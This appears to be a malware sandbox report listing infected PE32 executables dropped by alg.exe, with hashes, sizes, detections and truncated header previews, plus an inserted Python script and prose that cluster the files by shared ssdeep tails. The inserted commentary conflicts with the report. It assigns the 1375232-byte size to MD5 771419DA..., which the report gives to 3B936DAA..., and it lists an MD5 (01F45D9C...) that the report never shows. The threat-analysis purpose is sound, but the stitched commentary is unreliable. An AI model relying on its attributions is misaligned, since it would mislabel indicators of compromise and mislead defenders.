                                                                                                                                                SSDEEP:12288:mnEbH0j4x7R6SvyCMzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:mkwOtO7zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:771419DA92024B43EFA488F4BCAF9107
                                                                                                                                                SHA1:083A46C21090F65B7B8039447395D0F428EC5E5B
                                                                                                                                                SHA-256:451B245EA03A35206202D28EC09439E57EA7E14AA0AA4491229BD32BCD5F5861
                                                                                                                                                SHA-512:E0739F12ADE3EBA12578BED1853367998C632A43EC92A5A48A8E8601E33AECD1F19207E7F68527C6F349E810C67B7974335F30ED53C296BEFAC3981D0547F474
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1212416
                                                                                                                                                Entropy (8bit):5.119733771190659
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:tv1vvSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:p1ysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:8050EE33966C55A2A3ECF0817E65A270
                                                                                                                                                SHA1:20C14D64D60C2AE51FE16C2F8ACCBE182247FD9A
                                                                                                                                                SHA-256:E8E40C4A2696AE2FC5A8DA6F1C8C836998D53615049E5617D86AFBE349CB6C2F
                                                                                                                                                SHA-512:E65CAACC511C842AB2AD45DFAE433AA6DC183820A014FE2190B83D985C2DA5D12459B92355475E08B092936A248CB63C30061813EE81966D701FE070D7A86804
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................r......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.446825237836686
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:onU/h/4KIsqjnhMgeiCl7G0nehbGZpbD:oU/V0Dmg27RnWGj
                                                                                                                                                MD5:3B936DAABC0CCDF51D873BA2DDCA2310
                                                                                                                                                SHA1:CA347501E2157F7C0245EDEA48D8E53796DE9D10
                                                                                                                                                SHA-256:0154FB6F6FE6509C6F748D955ABB2A8487D242762357BF7217551C52012A610F
                                                                                                                                                SHA-512:271A6E54B3D2FA4D4FA94AF65752168535E027FBBDC2CDEC6BE09865BFAC364872FDCA10DBF77A6F4825679F6641D7E176C0BF6436695F7A9BD3A59E4D369325
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1513984
                                                                                                                                                Entropy (8bit):5.48374489476901
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:vx71iBLZ05jNTmJWExXsqjnhMgeiCl7G0nehbGZpbD:vxhiHIjNgrDmg27RnWGj
                                                                                                                                                MD5:C80420C2C6B8D08B234266BDF618FF8E
                                                                                                                                                SHA1:E365B0E65AA125B02B66AC8A05A225552664E8D6
                                                                                                                                                SHA-256:93506DF0F93242397CE47C7247B904EFFE0E9D9E5549753C111222B271058067
                                                                                                                                                SHA-512:A6C1608AF3E72FEAF0C2C2203583B6A661DC11C48B3C6F6A81D1DB804DCA8F2B05138D7E6CEAF7003D0BBE18EEEA49A566CB73551995C1FB842C4EE4307FAADF
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032897068091881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:v3rmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:CE48C36A1E01BC982A327E2E3C605FBD
                                                                                                                                                SHA1:A08E83CF357EEAE386ACFA75817C5A8F57357D01
                                                                                                                                                SHA-256:0F3DA0A4CD67761539DF52C8EA74730170A1F7FA83EA0171957FC381D7CBCDD7
                                                                                                                                                SHA-512:DAC230239B8FA080B7BBAA207BF5F79ADB7054A759342CCDA2EF5FA43D21BAF35354718319826826E86FFCBFFF6486E37B66DA0C33BB71C6DE9A272DF57F9E0E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................)n.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1242112
                                                                                                                                                Entropy (8bit):5.172681387297573
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:SYdP/xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdP/xsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:062489F464DCC3E2F661721927B939EB
                                                                                                                                                SHA1:B4449CA9A4EB025A3700E9E20552F6622C36F10C
                                                                                                                                                SHA-256:B55EED75015EEEAD987FA23A54606C3A0C32C0915774E7889864B5CF74D8FEDE
                                                                                                                                                SHA-512:DF946DEAA9DC347F4748FEC19F8DA2E69232B2577D812CD9CC471053A6598EF4BDEA92A2626B6B22C7E23C533F28EF3096ABEDD499FB70AA02B4444379177CC7
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032913903151245
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:2y5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:BB43E319BF9789B70488310FF13DB112
                                                                                                                                                SHA1:9739108105F388E84BF19BED9E00B0CC36987BB0
                                                                                                                                                SHA-256:6A55502C7A99C88EA5E758EA9FC4A05D052BAA176C21FADF8A396D0C0BA88C9E
                                                                                                                                                SHA-512:B01387D68BE6F3B38A37868003362E10AB0AFE9AE880CD0F4056CEA2AD613FBF4C430B793957AE208D6CC559326AB2E0E46A5A62EF2E848028253A2B26CEC45F
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................q.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.032988606726022
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:bKl2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:77131FDDFA3464A6195A37D61F7F9C90
                                                                                                                                                SHA1:8B83F3846F34A1D63D0F7926AAF68C2E8F5A8089
                                                                                                                                                SHA-256:C5B2BFBECF6F308C90059414645968A3B2393C347D6401FFFB1C22BC3B5781C8
                                                                                                                                                SHA-512:A59FAF0777F855612EF710F19B0D2273806BE64081E47B5EAD248503A936770A763D52408572D1646DFDF759BBC82501F3F24D1B4AEFA8FC72E447B629ED52BF
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................;.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
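The dropped files above are worth reading side by side rather than one at a time: several have identical sizes (1142272 bytes), and the ssdeep fuzzy hashes of all of them end in the same run of characters. An ssdeep signature is blocksize:chunk:double_chunk, where each character summarises one content-triggered piece of the file in order, so a long common suffix means the files end in the same bytes, which is what appending one payload to many different host executables produces. The script below is an added example written for this page, not Joe Sandbox output; only the (MD5, ssdeep) pairs are copied from the entries above, and the function names, the 64-character chunk cap (ssdeep's own SPAMSUM_LENGTH) and the min_len threshold are this example's assumptions. It needs no external library.

```python
"""
Group the dropped files listed above by the content their ssdeep signatures
say they share (added example, not part of the Joe Sandbox report).

ssdeep signature layout:  blocksize:chunk:double_chunk
`chunk` is computed with `blocksize`, `double_chunk` with 2*blocksize, so a
signature at block size b is comparable with one at 2b by lining up b's
double_chunk against 2b's chunk.
"""

SPAMSUM_LENGTH = 64  # ssdeep caps each chunk at 64 characters

# Copied from the dropped-file entries above: (report MD5, ssdeep)
DROPPED = [
    ("01F45D9CB360821BF19D9473E1EE9E7F",
     "12288:YK2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:l2sqjnhMgeiCl7G0nehbGZpbD"),
    ("771419DA92024B43EFA488F4BCAF9107",
     "12288:mnEbH0j4x7R6SvyCMzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:mkwOtO7zsqjnhMgeiCl7G0nehbGZpbD"),
    ("8050EE33966C55A2A3ECF0817E65A270",
     "12288:tv1vvSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:p1ysqjnhMgeiCl7G0nehbGZpbD"),
    ("3B936DAABC0CCDF51D873BA2DDCA2310",
     "24576:onU/h/4KIsqjnhMgeiCl7G0nehbGZpbD:oU/V0Dmg27RnWGj"),
    ("C80420C2C6B8D08B234266BDF618FF8E",
     "24576:vx71iBLZ05jNTmJWExXsqjnhMgeiCl7G0nehbGZpbD:vxhiHIjNgrDmg27RnWGj"),
    ("CE48C36A1E01BC982A327E2E3C605FBD",
     "12288:v3rmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PysqjnhMgeiCl7G0nehbGZpbD"),
    ("062489F464DCC3E2F661721927B939EB",
     "12288:SYdP/xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdP/xsqjnhMgeiCl7G0nehbGZpbD"),
    ("BB43E319BF9789B70488310FF13DB112",
     "12288:2y5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rosqjnhMgeiCl7G0nehbGZpbD"),
    ("77131FDDFA3464A6195A37D61F7F9C90",
     "12288:bKl2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eUsqjnhMgeiCl7G0nehbGZpbD"),
    ("97311C6C5B039CA66321B36A0D50AE90",
     "12288:Nil2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wUsqjnhMgeiCl7G0nehbGZpbD"),
]


def parse_ssdeep(sig):
    """Split 'blocksize:chunk:double_chunk' into (int, str, str)."""
    blocksize, chunk, double_chunk = sig.split(":", 2)
    return int(blocksize), chunk, double_chunk


def chunk_at(sig, target_bs):
    """The chunk of `sig` that was computed at block size `target_bs`, or None."""
    blocksize, chunk, double_chunk = parse_ssdeep(sig)
    if blocksize == target_bs:
        return chunk
    if 2 * blocksize == target_bs:
        return double_chunk
    return None


def common_suffix(strings):
    """Longest suffix shared by every string ('' if none or no overlap)."""
    if not strings:
        return ""
    suffix = ""
    for n in range(1, min(len(s) for s in strings) + 1):
        candidate = strings[0][-n:]
        if all(s.endswith(candidate) for s in strings):
            suffix = candidate
        else:
            break
    return suffix


def capped(sig):
    """True if the base chunk hit ssdeep's 64-character limit. The tail of the
    file is then not represented in that chunk, so a suffix comparison at that
    block size can miss a real match; compare at the doubled block size."""
    _, chunk, _ = parse_ssdeep(sig)
    return len(chunk) >= SPAMSUM_LENGTH


def shared_tail(entries, target_bs, min_len=8):
    """Return (suffix, names) over every entry comparable at `target_bs`.
    `min_len` is this example's own cut-off for calling a suffix meaningful;
    unrelated files rarely share more than a couple of trailing characters."""
    comparable = []
    for name, sig in entries:
        chunk = chunk_at(sig, target_bs)
        if chunk is not None:
            comparable.append((name, chunk))
    suffix = common_suffix([chunk for _, chunk in comparable])
    if len(suffix) < min_len:
        return "", []
    return suffix, [name for name, _ in comparable]


def cluster(entries):
    """Map each block size present in `entries` (and its double) to the
    shared tail found at that block size."""
    sizes = set()
    for _, sig in entries:
        blocksize = parse_ssdeep(sig)[0]
        sizes.update((blocksize, 2 * blocksize))
    return {bs: shared_tail(entries, bs) for bs in sorted(sizes)}


if __name__ == "__main__":
    for bs, (suffix, names) in cluster(DROPPED).items():
        print(f"block size {bs}: {len(names)} files share tail {suffix!r}")
    for name, sig in DROPPED:
        if capped(sig):
            print(f"{name}: base chunk at the 64-char cap, file tail not represented")
```

Run stand-alone, it reports that at block size 24576 all ten files share the 23-character tail sqjnhMgeiCl7G0nehbGZpbD, while at block size 12288 no common tail is found: the 1375232-byte file with MD5 771419DA92024B43EFA488F4BCAF9107 has a base chunk that is exactly 64 characters long, so ssdeep stopped summarising before the end of that file. This is the usual trap when eyeballing ssdeep strings of infected hosts of different sizes; always compare at the block size where every chunk still has room. The two signatures computed at 24576 also share a shorter tail at 49152, which is the same conclusion seen at coarser granularity.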

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032994306009622
Encrypted:false
SSDEEP:12288:Nil2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wUsqjnhMgeiCl7G0nehbGZpbD
MD5:97311C6C5B039CA66321B36A0D50AE90
SHA1:01A3FC90870F31982AA65D690B58E3C20AFD03FE
SHA-256:FB27AEEAFFFC4C309357DF28D22DD6BE89B836AA0E1CFFAE8BF779E961019C1B
SHA-512:D8C05A102783020A10B6C3A1259CD311291AC7D3E4A9817B9497F5BE92A459609492C8AB53BB1DC0013D25F9A9313BF619EF07C331293EA54A80A34276DB3EA7
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.0329676246506665
Encrypted:false
SSDEEP:12288:YTmWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:y/sqjnhMgeiCl7G0nehbGZpbD
MD5:EC68C9CF7E0B392CA514C5D8C4D3FBB8
SHA1:DF47BA633BD21937F034EACE576E14BE9DAB0C79
SHA-256:FC275C3813B7756A20777A1D14733C9B10D9C8B2A4A7AFA967F796D5E5EE4438
SHA-512:8A2F38F104BFB4550B0EC12508DE7EAF4ABAF09015BEDFB9B9300489B98F5464D6D2105FD2400108C628F70C546B42AB9AD28D1364DEE906A433E3414634F352
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.033882385629566
Encrypted:false
SSDEEP:12288:AamSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nTsqjnhMgeiCl7G0nehbGZpbD
MD5:3974FBBF22DE5A207EA2128919D90CB9
SHA1:03AEBC59550D0D07496A47BFEB377166940DB2F2
SHA-256:F92CDB6476AB1489F68D1949653A1C671A9864DECDF1C59D14EA30549BC93FD0
SHA-512:BAF660B7F01CB0BF9DEAAC6A003B381E385299F74EED67372416A239E620AA16BF124972528BCA175E1808890F76460FD32E12D0FBFF8F81B36F20E261E8A2E0
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032939548245491
Encrypted:false
SSDEEP:12288:wQ5uXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/AsqjnhMgeiCl7G0nehbGZpbD
MD5:0292F4340543E352E121A5F6AE9DFCC0
SHA1:16BB13D9FE861F61C02D68BD37A9923B67ED1983
SHA-256:990C9BF04067E1223F0F37374A919ACCA28708A5738F0CE7060B3CCBBE2DBEDF
SHA-512:C00974C31145EDB4AB125DB6668B0416D66662202D53DD9383F8ED314B4E4710E1661DA31CE0B54A3E91C5BEE5CBB764A5875459C8544D1F1A71B584FC5687E4
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032972695543292
Encrypted:false
SSDEEP:12288:FV/2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:n+sqjnhMgeiCl7G0nehbGZpbD
MD5:4C7A9CA296BC3DC05799C5A054D4AC93
SHA1:A57C00760A74D97E101F0136F532973903A257AD
SHA-256:83FBE164A78C206F711219BEB481EC2D432E434BB4A260618FE506729AEC18D5
SHA-512:9626F2B0B07D49C84D186EC6F5591D88B1A78129A627D63DAEF55EE634DCCEE20B2F002AD433634F469FF0995A54397D53669FBE6E799325C47D354F0D3F0F02
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032865086368631
Encrypted:false
SSDEEP:12288:nZmGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Z/sqjnhMgeiCl7G0nehbGZpbD
MD5:24701A353A327AEA0E0367A5C087CCAB
SHA1:93E272CC712E544AB1A8A87D3791DE9275184E99
SHA-256:313FAA2E69AF5F2961D0DA8712DE272EEBE907555A87BA6699243E855D4FB757
SHA-512:F2D8F076D5CB09DA843A0A0F7439FBEB98F2A35536836541FD1743C5F1C4E7D323C3819A4ECB9D6E75F80FC70FC9BF3839647FC1D634FD0AA4D4EC02482241A8
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032924380643697
Encrypted:false
SSDEEP:12288:HeSOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+7sqjnhMgeiCl7G0nehbGZpbD
MD5:E799480448164BD8C6B6B5779171158F
SHA1:D900DB7CC332526C0A7E1E45C4652A8A6A522BA2
SHA-256:D9F69DF91E757ACCE570E2FEDB90B2982A52A88EB76DCD21DBE9EDE5BDF74615
SHA-512:23C245B88D4C5ECF2A97E560FC631F225F78F45F0BFEB3959F6A3D13BF22434AA74CF5D7937AFF3BF29DCB8DD0A4B1F3C421A623D481BDF96FF9F0E8274EA096
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032988434496137
Encrypted:false
SSDEEP:12288:p5/2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:X+sqjnhMgeiCl7G0nehbGZpbD
MD5:08EEBCD1C3CC16D349B64B7BF4145461
SHA1:850F4AE78D29C017DD131541441C4362993A468E
SHA-256:120DDAD61D1B0FEC8F4F75AD1EF03F32F261C7EB5DDCC213DDD276CE7279DD52
SHA-512:2D2926365F520A15FB6EA81001B870D89D19F0A13A72C65168D587DDFD48FCD8BFD10192C6815AAE47BDD0A9F50E712065E70132DC6625705165D46BFEC4F01D
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1202688
Entropy (8bit):5.098063756161126
Encrypted:false
SSDEEP:12288:Q7gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q7gsqjnhMgeiCl7G0nehbGZpbD
MD5:DB80AD300EDC95968247B704996BD9B8
SHA1:EBE15F2F327AC2064681EBD94EB8D5AFD08CF164
SHA-256:3F997039703D4B541A817DFF4649DFA93E99C0829B31A0542AE45132DF217E2C
SHA-512:73A5AFE2B15F1F0444E49E27137A46B3487051AE8F4D7C1B39DF829360FBD9C060E609C02454542C4BBFE872699E0E1FEF9C0331A34B99A3DCA16267B0D62231
Malicious:true

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142784
Entropy (8bit):5.0323307195846905
Encrypted:false
SSDEEP:12288:UKQCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pdsqjnhMgeiCl7G0nehbGZpbD
MD5:A3B55563678F6333F15DD3C711DC9F37
SHA1:59EC392562352AD124D20EC3C3A52A6A48A7AA9C
SHA-256:C0727C3473141D80FD42F4B7E00A0DDC46EC9955D9B8C5C6ED719ABF9534BAF6
SHA-512:D62EDEC9487E37BFC044C8A50FEFD2AD0F8F31D49D8E128CB07280955A10F3C6B214964FADA578F23C64372F6CD6CDDB558117C51973DAB068F146CA0189FC44
Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1298944
                                                                                                                                                Entropy (8bit):5.249111399766614
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4i7l/3roAEsqjnhMgeiCl7G0nehbGZpbD:rl/roAgDmg27RnWGj
                                                                                                                                                MD5:4228B587F0411752E1638AD29342006D
                                                                                                                                                SHA1:3081366C708355EA2984575E5F57DD2626E06C27
                                                                                                                                                SHA-256:EB97D7A14EB2CC34C8A6E175B9C850E814C479C8FE2CD992494CB09CFD035B2E
                                                                                                                                                SHA-512:6A318F9608C34B455162AE25FCEF1E187D05893D6C2358DA7D44FBA32364AED56E26C70229D598E93E02DBC6EBC7629AB950EE1F207DE759561814D0C2E0D764
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1269248
                                                                                                                                                Entropy (8bit):5.282056179727992
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:n5bfQnMXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nNfQnMsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:24502D059DFB7BEB0E2C0788672FDFEC
                                                                                                                                                SHA1:7DD6798F1993D86C950E18433F61B0B2BDEE1913
                                                                                                                                                SHA-256:FEBFCB0F78BB669AC4501236ABE6658F90ECEB29C851E668A81EF6DCA123642F
                                                                                                                                                SHA-512:1C98FD76C2737A5F7DC184D688BC256CBB5611F69C7650CCF60D41B72B6EBB3776D5A6CB29259E8A4CBA4986609277DA800FE34677F569A5F9CA1DF92E52B0A1
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1287680
                                                                                                                                                Entropy (8bit):5.298512952008668
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:9Nmt0LDILi21XXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:YLi4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:3ED99541B4DD248AC267B5C6F819E00E
                                                                                                                                                SHA1:D8D4B7F09365DA6D8B65666086473DA951FE7618
                                                                                                                                                SHA-256:74D36941264A6892173C5A53A1507538F490E064AFA6BA34DD2D00F94F601C4F
                                                                                                                                                SHA-512:8DB1CAF38F0961CD2ECF74A4E9F1E28D298A579DE9268BD2665534EAED27F506412054DE44A7DC557C3C52EA84188DA1D985B2ABB371770A211DEC751DF65D12
                                                                                                                                                Malicious:true
